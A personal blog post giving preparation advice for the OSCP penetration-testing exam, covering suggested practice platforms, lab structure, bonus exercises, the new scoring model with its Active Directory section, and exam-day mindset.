On the 29th of January, 2022, I successfully overcame the new version of the OSCP exam. Hence, in today's post, I will tell my opinions on what you need to do before purchasing the course, tips about the new exam model and what you need to know before taking the exam.
Before purchasing the course
The course teaches a vast amount of topics in a PDF of 850 pages and videos, which are very time consuming, so every minute reading the PDF, you are wasting time on the laboratory, which undoubtedly you will need.
In my opinion, the document should be used to solve doubts about a specific topic and for the mandatory exercises for obtaining ten bonus points that can help you pass the exam.
So, "where do I start?" Well, if you are a complete newbie, buy one or several VIP subscriptions on TryHackMe and start doing the rooms of the learning path:
Now, continue completing more rooms until you find almost no difference between rooms. Moreover, feel free to read as many write-ups as you want while doing a room; you need to learn the basics and understand what steps you need to own a machine.
Once you are tired of TryHackme continue, with HackTheBox by completing the TJNull's list, where you will find some boxes similar to the ones in the lab.
Finally, while you are completing machines, take notes about the techniques used because it is inevitable that some of them will appear similarly in the exam, so you can exploit them without wasting time remembering them. Furthermore, doing write-ups of each pwned machine will prepare you for the exam report.
Luckily for us, privilege escalation shouldn't be hard if you have taken notes while attacking machines, have watched the privilege escalation courses and have completed the privilege escalation rooms.
Both courses and rooms are pretty similar so it is up to you if you want to take both or just one of them.
In the new exam model, the Windows Buffer Overflow vulnerability might not appear to you. However, it is not a bad practice to be prepared in case you need to encounter it.
For being prepared you can do the Buffer Overflow exercises in the course and the following rooms:
Note the process because the BoF in the exam is going to be really really similar.
From January 12 the exam will have Active Directory as a mandatory part with a value of 40 points. This part consists of three Windows machines where you will have to jump from machine to machine until you become the administrator of the domain controller. So, you need to know about windows privilege escalation, Active Directory and Kerberos that can be learned from the following rooms.
- Active Directory Basics
- Attacking Kerberos → Vídeo
- Attacktive Directory → Video
- Post exploitation tasks (Mimikatz)
Keep in mind, that in the OSCP the Active Directory is not going to be harder than this, but if you want to improve your knowledge I encourage you to complete Throwback.
The lab is divided into several sections: Public Network, IT Department, Development Department and Administrator Department; being the former, the starting point for unlocking the rest. For doing so, you will need to obtain the
network-secret.txt stored on the root's home directory of some of the lab machines.
Furthermore, some machines have dependencies so you will need to own a previous machine where you will find information for accessing the former. This aspect of the lab is what I hated the most because there is no information on which machines have dependencies, just hints from people on the forum, so you are wasting your time on machines that you do not have any chance to complete unless you have completed its dependant. Moreover, there are no hints about where you can use the information obtained once completed a machine, which I find annoying.
Are the exercises worth it?
Before the new model, you needed to complete the 104 course exercises for obtaining 5 points in the exam. Nowadays, you need to complete the 104 course exercises and obtain ten
proof.txt with their write-ups. However, is it worth it?
Actually, it is really worth it, because it is your only option to pass the exam if you don't complete the Active Directory domain. Nonetheless, you will have to complete all the stand-alone machines in the exam which might be harder than the AD.
Finally, you have to know that completing the exercises might take you two weeks of your lab time so keep it in mind if you are running out time
The new exam model consists of two parts: three independent machines and an Active Directory Domain. The former has a value of 60 points, ten points for each user and root flag. The latter has a value of 40 points but you need to complete the whole domain to obtain them.
Knowing that, your only two strategies are:
- 30 Points of standalone machines + Active Directory (40)
- 60 Points of standalone machines + 10 Points from the course exercises.
Furthermore, there is a high chance that you will encounter services that don't have vulnerabilities associated or there are for another Operating Systems on searchsploit; which is something that rarely happens in the lab. Hence, you need to think outside the box trying to exploit service miss-configurations.
For example: You can find a service or web application that doesn't have any exploit on searchsploit, github, cve.mitre.org, etc. so you will have to find manually if it is vulnerable to SQLi, Path Traversal, Command Injection, etc.
Finally, the exam requires you to stay calm and not panic; you need to be relaxed and do not worry if you are not getting any points in the first hours of the exam ( I didn't get user on any machine until the first 6 hours of the exam). Keep trying all the possibilities until you have run out of ideas. Then, look for new ideas about the topic you are trying to exploit on the Internet and the most important of all K.I.S.S. (Keep It Simple, Stupid).
The PEN-200 course is NOT an impossible task; it requires study, taking good notes and PRACTISING A LOT. If you have achieved these tasks you should not worry about the exam.
YOU CAN DO IT!!! ;D